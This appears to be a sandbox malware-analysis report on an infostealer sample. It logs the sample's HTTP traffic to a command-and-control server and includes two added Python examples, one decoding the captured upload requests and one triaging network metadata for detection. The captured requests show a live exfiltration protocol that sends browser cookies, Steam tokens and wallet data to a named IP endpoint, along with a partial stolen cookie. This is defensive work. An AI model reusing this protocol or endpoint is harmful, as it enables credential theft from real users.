name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlF
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file"------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file"------HIIIDAKKJJJKKECAKKJE--
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/freebl3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/mozglue.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/msvcp140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/nss3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/softokn3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/vcruntime140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 95.182.96.50Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJKHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="message"wallets------DGIJDAFCFHIEHJJKEHJK--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 95.182.96.50Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"files------CFBFHIEBKJKFHIEBFBAE--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHIHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="file"------GDHDAEBGCAAFIDGCGDHI--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 95.182.96.50Content-Length: 114487Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 95.182.96.50Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"ybncbhylepme------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBFHost: 95.182.96.50Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 2d 2d 0d 0a Data Ascii: ------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EHJKKKFIIJJKJKFIECBF--
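The POSTs above all go to one gate script and follow one shape: a first multipart body carrying hwid and build, then bodies carrying the token the server handed back together with either a message stage name (browsers, plugins, fplugins, wallets, files, and random-looking strings at the end) or a base64 file_name plus a base64 file. Added example, not code from the report or from the malware: the decoder below rebuilds a representative subset of those bodies byte-for-byte from the Data Ascii dumps (constructed input, checked against the stated Content-Length), parses the multipart framing, decodes the base64 fields, and treats a cut-off dump (the 751-byte cookie upload, which the report prints only partially) as truncated rather than failing on bad padding.

```python
"""Decode the Stealc/Vidar gate POSTs listed above.

Added example, not code from the sandbox report or from the malware. The bodies
are rebuilt from the report's Data Ascii dumps, so they are constructed input;
the cookie upload is rebuilt only as far as the report prints it, which is
deliberately shorter than its captured Content-Length of 751 bytes."""
import base64
import re

GATE = "http://95.182.96.50/2aced82320799c96.php"  # C2 URL from the report
TOKEN = "b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589"
COOKIE_B64 = (  # "file" field of the 751-byte POST, exactly as far as the dump shows it
    "Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkK"
    "Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFu"
    "eF9GU2wwNkY1VUVfdmRhRlF")

# (boundary from the Content-Type header, captured Content-Length, fields), per POST above
CAPTURED = [
    ("----DAECGCGHCGHCAKECBKJK", 215, [("hwid", "1D1788B892973370857647"), ("build", "mainteam")]),
    ("----JJEGCBGIDHCAKEBGIIDB", 268, [("token", TOKEN), ("message", "browsers")]),
    ("----IDHIIJJJKEGIDGCBAFIJ", 751, [("token", TOKEN),
        ("file_name", "Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0"), ("file", COOKIE_B64)]),
    ("----IJDHDGDAAAAKFIDGHJDG", 363, [("token", TOKEN), ("file_name", "c21qbGxteW1sYnpxLnB3ZA=="), ("file", "")]),
    ("----GDHDAEBGCAAFIDGCGDHI", 363, [("token", TOKEN), ("file_name", "c3RlYW1fdG9rZW5zLnR4dA=="), ("file", "")]),
    ("----DGIJDAFCFHIEHJJKEHJK", 267, [("token", TOKEN), ("message", "wallets")]),
]


def build_multipart(boundary: str, fields: list[tuple[str, str]]) -> bytes:
    """Emit the body exactly as the stealer does: CRLF line ends, one
    Content-Disposition header per part, closing delimiter "--<boundary>--"."""
    delim = b"--" + boundary.encode()
    body = b""
    for name, value in fields:
        body += delim + b"\r\n"
        body += b'Content-Disposition: form-data; name="' + name.encode() + b'"\r\n\r\n'
        body += value.encode() + b"\r\n"
    return body + delim + b"--\r\n"


def parse_multipart(body: bytes, boundary: str) -> dict[str, bytes]:
    """Split a multipart/form-data body into {field name: raw value bytes}.
    Values are returned exactly as sent; an empty part yields b""."""
    delim = b"\r\n--" + boundary.encode()
    if not body.startswith(delim[2:]):
        raise ValueError("body does not start with the declared boundary")
    fields: dict[str, bytes] = {}
    for chunk in (b"\r\n" + body).split(delim)[1:]:  # leading CRLF makes every delimiter uniform
        if chunk.startswith(b"--"):                     # closing delimiter
            break
        if not chunk.startswith(b"\r\n"):
            raise ValueError("delimiter not followed by CRLF")
        headers, sep, value = chunk[2:].partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', headers)
        if not sep or m is None:
            raise ValueError("part without headers or field name")
        fields[m.group(1).decode()] = value
    return fields


def b64_lenient(data: bytes) -> tuple[bytes, bool]:
    """Decode base64 that a capture may have cut off: decode the longest
    4-aligned prefix and report whether anything had to be dropped."""
    usable = len(data) - len(data) % 4
    return base64.b64decode(data[:usable], validate=True), usable != len(data)


def decode_beacon(boundary: str, body: bytes) -> dict:
    """Classify one gate POST by the field set the stealer uses."""
    f = parse_multipart(body, boundary)
    if {"hwid", "build"} <= set(f):
        return {"kind": "register", "hwid": f["hwid"].decode(), "build": f["build"].decode()}
    token = f.get("token", b"").decode()
    if "message" in f:
        return {"kind": "status", "token": token, "stage": f["message"].decode()}
    if "file_name" in f:
        name, name_cut = b64_lenient(f["file_name"])
        content, content_cut = b64_lenient(f.get("file", b""))
        return {"kind": "exfil", "token": token, "file_name": name.decode(),
                "content": content, "truncated": name_cut or content_cut}
    return {"kind": "unknown", "token": token, "fields": sorted(f)}


def replay(captured=CAPTURED) -> list[dict]:
    """Rebuild and decode each POST; dump_complete is False when the rebuilt
    body is shorter than the captured Content-Length, i.e. the dump was cut."""
    timeline = []
    for boundary, content_length, fields in captured:
        body = build_multipart(boundary, fields)
        rec = decode_beacon(boundary, body)
        rec["content_length"] = content_length
        rec["dump_complete"] = len(body) == content_length
        timeline.append(rec)
    return timeline


if __name__ == "__main__":
    print("gate:", GATE)
    for r in replay():
        what = r.get("stage") or r.get("file_name") or r.get("build")
        note = "" if r["dump_complete"] else "  [dump truncated]"
        print(f'{r["content_length"]:>5}  {r["kind"]:<8} {what}{note}')
```

Running it decodes the three file_name values to cookies\Google Chrome_Default.txt, smjllmymlbzq.pwd and steam_tokens.txt (the last two uploaded with an empty file part), and the recoverable prefix of the cookie upload to two Netscape-format cookie lines for .google.com (1P_JAR and NID). Rebuilding from the dump reproduces the 215, 268, 363 and 267 byte bodies exactly, which is the cheap way to confirm the framing assumptions; the cookie body comes out 193 base64 characters short of 751, so the sandbox display, not the malware, is what cut it.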
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49711 -> 95.182.96.50:80
Source: unknown TCP traffic detected without corresponding DNS query: 95.182.96.50 (50 connections)
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDCCC60 PR_Recv, 0_2_6CDCCC60
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/freebl3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/mozglue.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/msvcp140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/nss3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/softokn3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/vcruntime140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 31 37 38 38 42 38 39 32 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="hwid"1D1788B892973370857647------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build"mainteam------DAECGCGHCGHCAKECBKJK--
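Taken together, the HTTP lines above give a fingerprint that needs no payload inspection: the Host header is an IP literal (no DNS query precedes the connections, as the TCP lines record), no request carries a User-Agent, the POSTs go to /<16 hex>.php with multipart boundaries of 20 uppercase letters drawn from A to K, and the GETs pull sqlite3.dll plus the Mozilla NSS libraries and the VC++ runtime from a sibling 16-hex directory. Added example, not part of the report: the triage below scores request records on those four points. RECORDS is a constructed summary of the report's requests and BENIGN is constructed control traffic; the A-K boundary alphabet and the "three or more" thresholds are taken from this capture only, so treat them as assumptions before reusing them against other traffic.

```python
"""Metadata-only triage for the HTTP pattern this report attributes to Stealc/Vidar.

Added example, not part of the sandbox report. RECORDS is a constructed summary
of the report's GET/POST lines (one dict per request, only the fields the checks
read); BENIGN is constructed control traffic. The A-K boundary alphabet and the
"three or more" thresholds come from this capture alone, so treat them as
assumptions before reusing them elsewhere."""
import ipaddress
import re
from collections import defaultdict

GATE_RE = re.compile(r"^/[0-9a-f]{16}\.php$")              # /2aced82320799c96.php
BOUNDARY_RE = re.compile(r"boundary=----[A-K]{20}$")       # every boundary in the capture
DLL_RE = re.compile(r"^/[0-9a-f]{16}/([a-z0-9]+\.dll)$")   # /fee3b98529eb4b43/nss3.dll
SUPPORT_DLLS = {"sqlite3.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
                "nss3.dll", "softokn3.dll", "vcruntime140.dll"}   # the seven fetched above


def _req(method, uri, host="95.182.96.50", user_agent=None, boundary=None):
    """One request record; the defaults mirror the capture (IP Host, no User-Agent)."""
    ctype = f"multipart/form-data; boundary={boundary}" if boundary else None
    return {"method": method, "host": host, "uri": uri,
            "user_agent": user_agent, "content_type": ctype}


RECORDS = [
    _req("GET", "/"),
    _req("POST", "/2aced82320799c96.php", boundary="----DAECGCGHCGHCAKECBKJK"),
    _req("POST", "/2aced82320799c96.php", boundary="----JJEGCBGIDHCAKEBGIIDB"),
    _req("POST", "/2aced82320799c96.php", boundary="----ECGDHDHJEBGHJKFIECBG"),
    _req("POST", "/2aced82320799c96.php", boundary="----BKJKEBGDHDAFHJKEGIID"),
] + [_req("GET", f"/fee3b98529eb4b43/{d}") for d in sorted(SUPPORT_DLLS)]

BENIGN = [  # constructed: named host, a User-Agent, an ordinary browser-style upload
    _req("GET", "/download/setup.exe", host="www.example.com", user_agent="Mozilla/5.0"),
    _req("POST", "/api/upload", host="www.example.com", user_agent="Mozilla/5.0",
         boundary="WebKitFormBoundary7MA4YWxkTrZu0gW"),
]


def host_is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IP (no DNS lookup precedes the
    connection, which is what the TCP lines above record). Strips one :port."""
    candidate = host.split(":")[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def triage(records) -> dict:
    """Group requests by Host and collect the indicators each host triggers."""
    hosts = defaultdict(lambda: {"indicators": set(), "gate_posts": 0, "dlls": set()})
    for r in records:
        h = hosts[r["host"]]
        if host_is_ip_literal(r["host"]):
            h["indicators"].add("host-is-ip-literal")
        if not r.get("user_agent"):
            h["indicators"].add("no-user-agent")
        if (r["method"] == "POST" and GATE_RE.match(r["uri"])
                and BOUNDARY_RE.search(r.get("content_type") or "")):
            h["gate_posts"] += 1
        m = DLL_RE.match(r["uri"])
        if r["method"] == "GET" and m and m.group(1) in SUPPORT_DLLS:
            h["dlls"].add(m.group(1))
    strong = {"multipart-gate-beacons", "browser-crypto-dll-fetch"}
    for h in hosts.values():
        if h["gate_posts"] >= 3:
            h["indicators"].add("multipart-gate-beacons")
        if len(h["dlls"]) >= 3:   # NSS/sqlite set used to read browser credential stores
            h["indicators"].add("browser-crypto-dll-fetch")
        h["verdict"] = ("stealer-c2" if strong <= h["indicators"]
                        else "suspicious" if h["indicators"] else "clean")
    return dict(hosts)


if __name__ == "__main__":
    for host, h in {**triage(RECORDS), **triage(BENIGN)}.items():
        print(f'{host:<16} {h["verdict"]:<11} {sorted(h["indicators"])}')
```

The two weak indicators (IP-literal Host, missing User-Agent) are common enough in legitimate updaters that on their own they only earn "suspicious"; the verdict flips to "stealer-c2" when the gate POSTs and the DLL fetch both appear against the same host, which is the combination this report shows and the one worth a Suricata or proxy rule.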
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.00000000032E4000.00000040.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.php
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.php)6
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.php2
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpG
